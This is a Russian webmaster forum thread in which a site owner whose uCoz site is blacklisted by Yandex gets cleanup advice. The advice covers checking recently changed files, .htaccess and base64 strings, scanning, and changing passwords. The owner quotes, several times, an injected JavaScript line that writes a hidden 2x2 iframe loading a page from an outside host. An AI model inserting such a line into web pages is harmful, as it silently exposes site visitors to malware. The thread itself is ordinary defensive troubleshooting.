- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Что делать, если ваша email-рассылка попала в спам
10 распространенных причин и решений
Екатерина Ткаченко
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Всем доброй ночи!
Вчера на сайте был обнаружен вирус со стороны поисковой системы Яндекс.
Практически 65-70% трафика на сайте - это поисковая система Яндекс. В следствии обнаружения вредоносного ПО, произошла блокировка прямых заходов.
В выдаче сохраняются результаты, но перейти на сайт можно только после одобрения пользователем запроса: "Этот сайт является опасным и может навредить Вашему компьютеру, продолжить?"
Конкретного указанного юрл скрипта либо фрейма не было, поэтому изначально даже не было известно, где искать вирус.
Для поиска стороннего ПО использовались ведущие онлайн-сервисы:
http://2ip.ru/ - вирусов не обнаружено
http://vms.drweb.com/online/ - вирусов не обнаружено
http://antivirus-alarm.ru/ - вирусов не обнаружено (было задействовано для поиска несколько антивирусных баз одновременно)
После этого был отправлен запрос на повторную проверку сайта на наличие вредоносного ПО.
P.S. 3 часа назад ситуация в корне изменилась. Теперь на сайт вообще нельзя заходить - браузер Opera блокирует автоматически содержимое от пользователя.
Можно зайти только принудительно закрыв предупреждение.
И даже в этом режиме, постоянно мелькает сообщение, что на сайте имеется вирус.
Помогите, пожалуйста, решить проблему.
---------------------
Поисковая система Яндекс выдает вот такое сообщение:
.---------------------
Использовал кучи сервисов проверки, но ни один не указал на наличие вредоносного ПО, а тем более, на конкретную проблему. :(
Может у вас popunder до этого на сайте стоял? Через них частенько вирусня проскакивает. На этой неделе уже два раза от яндекса блок словил, помогло снятие кода и повторная перепроверка.
Сайт монетизируется только через Яндекс, иногда подключал Adsense. Только что запустил онлайн Dr.Web + McAfee - вирусов не обнаружено.
За последние 4 часа на сайте было около 3-4 человек. Обычно за час получается 90-100 человек.
Плагины все родные стоят? (Есть ли крякнутые или скаченные не из репозитария? То же касается и тем)
Тем же совхозом проверяли содержимое?
Вирустотал что то находит?
Зарегистрируйтесь в яндекс вебмастере, на будущее будите точно знать, где и что яндекс у Вас нашел...
Какая cms используется? Iframe не так легко найти, обычно он чудесным образом закодирован, можно начать с скана движка на наличие base64. Хотя не факт, что что-то найдете. Из бэкапа восстановить сайт и/или обратиться с вопросом к хостеру не думали?
Там Wordpress? Не?
---------- Добавлено 04-03-2013 в 02:15 AM ----------
Можете проверить на хостинге наличие файлов измененных в последнее время (по дате), если их не трогали, то начинайте искать от туда.
Проверьте htaccess на наличие в нем лишнего.
Смотрите какие файлы изменялись последнее время, в них необходимо искать заразу.Как сказал chaika, скорее всего сам код вируса может быть закодирован в base64, ищите в последних измененных файлах слово "base64" оно укажет на код зловреда.
Обратите внимание на файлы и папки со странными названиями, особенно если их ранее не было на сервере.
Так же рекомендую посмотреть
Аналогичная проблема у меня была.
Очень рекомендую сделать следующее:
1. установить на свой компьютер антивирус Sophos:
http://www.sophos.com/en-us/
Яндекс проверяет сайты именно этим антивирусом. По ссылке доступна к скачиванию бесплатная триальная версия на 30 дней.
2. Закачать все файлы сайта к себе на компьютер и проверить его антивирусом Sophos.
3. Найти все подозрительные файлы и дальше уже ручками это все чистить.
4. Обязательно посмотрите на файл .htaccess - зараза может быть там.
Зарегистрируйтесь в яндекс вебмастере, на будущее будите точно знать, где и что яндекс у Вас нашел...
Я там зарегистрирован более 3-ех лет назад. Я в первом сообщении указывал на то, что пишет яндекс. Конкретного примера вируса нет, только его название.
Я не АС в вирусном ПО, поэтому найти вирус только по его названию без конкретного кода либо файла не могу. :(
---------- Добавлено 03.04.2013 в 11:30 ----------
Там Wordpress?
Как бы это банально не звучало, но это - мой один из первых сайтов и создан он в Ucoz, не WP.
---------- Добавлено 03.04.2013 в 11:31 ----------
Проверьте htaccess на наличие в нем лишнего.
Смотрите какие файлы изменялись последнее время, в них необходимо искать заразу.Как сказал chaika, скорее всего сам код вируса может быть закодирован в base64, ищите в последних измененных файлах слово "base64" оно укажет на код зловреда.
Обратите внимание на файлы и папки со странными названиями, особенно если их ранее не было на сервере.
Так же рекомендую посмотреть
Спасибо, сейчас просмотрю. Хостеру отправил письмо, жду ответа.
---------- Добавлено 03.04.2013 в 12:17 ----------
Только что зашел на сайт, выбрал сортировку по дате и обнаружил изменение файлов *.js, в которые дописывался следующий код:
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://globetask.com/wbny.html?j=2827125></iframe>');Но как это может быть связано с вирусом? И действительно ли проблема именно в данном коде?
Пару дней назад была тоже такая проблема, но у меня были cms. Был залит шел после чего заражены все js файлы
Рекомендую этот сервис для поиска заразы http://sitecheck.sucuri.net/results/m-body.ru
Там есть функция сканирования.
Для начала выкачайте весь сайт на пк и тотал командером выполните поиск всех файлов как с найденным кодом выше так и всех js.
у меня зараза начиналась на такое
Только что зашел на сайт, выбрал сортировку по дате и обнаружил изменение файлов *.js, в которые дописывался следующий код:
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://globetask.com/wbny.html?j=2827125></iframe>');Но как это может быть связано с вирусом? И действительно ли проблема именно в данном коде?
Да, вы нашли то что нужно.
Первое, что нужно сделать - обновить все, абсолютно все модули, cms и что там ещё ucoz дает обновить. Второе - меняйте пароли к базе и админке. Третье, если недавно зарегистрированные пользователи - удаляйте их.
У вас действительно есть вирус на сайте. Мой каспер просто с ума сошел, когда я полазил по вашему сайту.
Рекомендую этот сервис для поиска заразы http://sitecheck.sucuri.net/results/m-body.ru
Там есть функция сканирования.
Использовал этот сервис еще вчера, но ничего толком не определил. Пишет, что сайт чистый по всем показателям, но он находится в блек-листе Яндекса. Конкретики по вирусному коду я не увидел.
---------- Добавлено 03.04.2013 в 13:21 ----------
У вас действительно есть вирус на сайте. Мой каспер просто с ума сошел, когда я полазил по вашему сайту.
Скажите, даже сейчас ругается? Я удалил коды в некоторых *.js файлах, где был дописан такой код:
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://globetask.com/wbny.html?j=2827125></iframe>');Неужели еще что-то есть? Если не трудно, можете написать или заскринить, что конкретно пишет каспер?